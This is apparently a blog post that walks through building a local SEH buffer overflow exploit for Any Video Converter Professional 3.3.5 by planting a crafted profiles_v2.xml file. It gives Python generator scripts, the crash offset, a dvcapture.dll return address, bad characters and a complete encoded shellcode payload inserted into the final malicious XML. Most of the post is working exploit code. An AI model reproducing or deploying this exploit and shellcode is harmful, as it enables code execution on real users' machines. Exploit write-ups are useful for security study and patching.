Thanks for reading my scribbles words, in this part i try to explore about Buffer Overflow SEH ( local ). I will explore Any Video Convertet Profesional (3.3.5). I Explore files which in folder program file. Let,s to journey:
**I try to modify file profiles_v2.xml with fuzzer container. This my structure:
<root>
<categories>
<category name="all" id="0" icon="cat_all.bmp" desc="buffer">
</categories>
<groups></groups>
<profiles></profiles></root>
**In buffer i change with junk character \x41 *1000 and create fuzzer with python.
#!/usr/bin/python
fuzzfile="profiles_v2.xml"
buffer="\x41"*1000
junk = "<root>\n"
junk+= "<categories>\n"
junk+= "<category name=\"all\" id=\"0\" icon=\"cat_all.bmp\" desc=\""+buffer+"\"/>\n"
junk+= "</categories>\n"
junk+= "<groups></groups>\n<profiles></profiles>\n</root>\n"
file=open(fuzzfile,"w")
file.write(junk)
print("File "+fuzzfile+" successful created ........")
file.close()
==> will be create file ==>profiles_v2.xml
**Running the fuzzer and replace file profiles_v2.xml in any vide.... dir
==> Fuzzer give an effect
==> SEH chain contain character 41414141
==> Shift + F9 ==> yeah... EIP overwrited with 41414141
**Create pattern and modify fuzzer , running replace again file .xml
** Cek pattern offset of EIP ==>316C4130 ==>332 ( offset )
** Like yesterday modify fuzzer with JUMP SHORT and dll address i use dvcapture.dll
**Modified fuzzer
#!/usr/bin/python
fuzzfile="profiles_v2.xml"
buffer="\x90"*328
#buffer+="\xcc\xcc\xcc\xcc"
#buffer+="\x33\xE6\x01\x10"
junk = "<root>\n"
junk+= "<categories>\n"
junk+= "<category name=\"all\" id=\"0\" icon=\"cat_all.bmp\" desc=\""+buffer+"\"/>\n"
junk+= "</categories>\n"
junk+= "<groups></groups>\n<profiles></profiles>\n</root>\n"
file=open(fuzzfile,"w")
file.write(junk)
print("File "+fuzzfile+" successful created ........")
file.close()
** generate shellcode and modify fuzzer and repalce again file .xml with newest .xml fuzzer file.
"\xb8\xb8\x0c\x2f\x1f\x2b\xc9\xdb\xc1\xd9\x74\x24\xf4\xb1\x51\x5a" "\x31\x42\x10\x03\x42\x10\x83\x7a\x08\xcd\xea\x86\x7b\xfa\x58\x9e" "\x85\x03\x9d\xa1\x16\x77\x0e\x79\xf3\x0c\x8a\xbd\x70\x6e\x10\xc5" "\x87\x60\x91\x7a\x90\xf5\xf9\xa4\xa1\xe2\x4f\x2f\x95\x7f\x4e\xc1" "\xe7\xbf\xc8\xb1\x8c\x80\x9f\xce\x4d\xca\x6d\xd1\x8f\x20\x99\xea" "\x5b\x93\x4a\x79\x81\x50\xd5\xa5\x48\x8c\x8c\x2e\x46\x19\xda\x6f" "\x4b\x9c\x37\x8c\x5f\x15\x4e\xfe\xbb\x35\x30\x3d\xf2\x9e\xd6\x4a" "\xb6\x10\x9c\x0c\x35\xda\xd2\x90\xe8\x57\x52\xa0\xac\x0f\xdd\xfe" "\x5e\x3c\xb1\x01\x88\xda\x61\x9b\x5d\x10\xb4\x0b\xe9\x25\x8a\x94" "\x41\x35\x3a\x42\xa1\x24\x47\xa9\x65\x48\x6e\x92\x0c\x53\xe9\xad" "\xe2\x94\xf4\xf8\x96\xa6\x07\xd2\x0f\x7e\xfe\x27\x62\xd7\xfe\x11" "\x2e\x8b\x53\xce\x82\x68\x07\xb3\x77\x90\x77\x55\x10\x7f\x24\xff" "\xb3\xf6\x35\x6a\x5b\xad\xac\xe4\x5b\xfa\x2f\xd2\x0e\x15\x81\x8f" "\x31\xc5\x49\x8b\x63\xc8\x60\x84\x84\xc3\x20\x7f\x84\x3c\xae\x9a" "\x33\x3b\x66\x33\x3b\x95\x29\xef\x97\x4f\x35\xdf\x8b\x18\x2e\xa6" "\x6d\xa1\xe7\xa7\xa4\x07\xf7\x87\x2f\xc2\x63\x41\xd8\x71\x01\x04" "\xfd\x1c\x89\x4f\xd7\x2c\xa0\x88\x4d\xe9\x3a\xb4\xa3\x31\xcf\x92" "\x3a\xf3\x1d\x1c\x80\xd8\xce\x6d\x7f\x19\x5a\xc6\x2b\x31\xee\xe6" "\x9f\xd4\xf1\x63\xa4\x27\xdb\xd0\x73\x8a\xb5\xb7\x2a\x40\x37\x66" "\x9c\xc1\x66\x77\xce\x82\x25\x5e\xea\x9c\x65\x9f\x23\x4a\x75\xa0" "\xfb\x74\x59\xd5\x53\x77\xd9\x2d\x3f\x78\x08\xff\x3f\x56\xdd\x0f" "\x35\x53\x41\xbc\xb5\x8a\x82\x92"
==> bad character ==> 00 0a 0d 22 26 3e
#!/usr/bin/python
fuzzfile="profiles_v2.xml"
buffer="\x90"*328
buffer+="\xcc\xcc\xcc\xcc"
buffer+="\x33\xE6\x01\x10"
buffer+=("\xb8\xb8\x0c\x2f\x1f\x2b\xc9\xdb\xc1\xd9\x74\x24\xf4\xb1\x51\x5a"
"\x31\x42\x10\x03\x42\x10\x83\x7a\x08\xcd\xea\x86\x7b\xfa\x58\x9e"
"\x85\x03\x9d\xa1\x16\x77\x0e\x79\xf3\x0c\x8a\xbd\x70\x6e\x10\xc5"
"\x87\x60\x91\x7a\x90\xf5\xf9\xa4\xa1\xe2\x4f\x2f\x95\x7f\x4e\xc1"
"\xe7\xbf\xc8\xb1\x8c\x80\x9f\xce\x4d\xca\x6d\xd1\x8f\x20\x99\xea"
"\x5b\x93\x4a\x79\x81\x50\xd5\xa5\x48\x8c\x8c\x2e\x46\x19\xda\x6f"
"\x4b\x9c\x37\x8c\x5f\x15\x4e\xfe\xbb\x35\x30\x3d\xf2\x9e\xd6\x4a"
"\xb6\x10\x9c\x0c\x35\xda\xd2\x90\xe8\x57\x52\xa0\xac\x0f\xdd\xfe"
"\x5e\x3c\xb1\x01\x88\xda\x61\x9b\x5d\x10\xb4\x0b\xe9\x25\x8a\x94"
"\x41\x35\x3a\x42\xa1\x24\x47\xa9\x65\x48\x6e\x92\x0c\x53\xe9\xad"
"\xe2\x94\xf4\xf8\x96\xa6\x07\xd2\x0f\x7e\xfe\x27\x62\xd7\xfe\x11"
"\x2e\x8b\x53\xce\x82\x68\x07\xb3\x77\x90\x77\x55\x10\x7f\x24\xff"
"\xb3\xf6\x35\x6a\x5b\xad\xac\xe4\x5b\xfa\x2f\xd2\x0e\x15\x81\x8f"
"\x31\xc5\x49\x8b\x63\xc8\x60\x84\x84\xc3\x20\x7f\x84\x3c\xae\x9a"
"\x33\x3b\x66\x33\x3b\x95\x29\xef\x97\x4f\x35\xdf\x8b\x18\x2e\xa6"
"\x6d\xa1\xe7\xa7\xa4\x07\xf7\x87\x2f\xc2\x63\x41\xd8\x71\x01\x04"
"\xfd\x1c\x89\x4f\xd7\x2c\xa0\x88\x4d\xe9\x3a\xb4\xa3\x31\xcf\x92"
"\x3a\xf3\x1d\x1c\x80\xd8\xce\x6d\x7f\x19\x5a\xc6\x2b\x31\xee\xe6"
"\x9f\xd4\xf1\x63\xa4\x27\xdb\xd0\x73\x8a\xb5\xb7\x2a\x40\x37\x66"
"\x9c\xc1\x66\x77\xce\x82\x25\x5e\xea\x9c\x65\x9f\x23\x4a\x75\xa0"
"\xfb\x74\x59\xd5\x53\x77\xd9\x2d\x3f\x78\x08\xff\x3f\x56\xdd\x0f"
"\x35\x53\x41\xbc\xb5\x8a\x82\x92")
junk = "<root>\n"
junk+= "<categories>\n"
junk+= "<category name=\"all\" id=\"0\" icon=\"cat_all.bmp\" desc=\""+buffer+"\"/>\n"
junk+= "</categories>\n"
junk+= "<groups></groups>\n<profiles></profiles>\n</root>\n"
file=open(fuzzfile,"w")
file.write(junk)
print("File "+fuzzfile+" successful created ........")
file.close()
** Execute program with .xml payload contain
== DONE ==
===================================================================================
===================================================================================
===================================================================================
No comments:
Post a Comment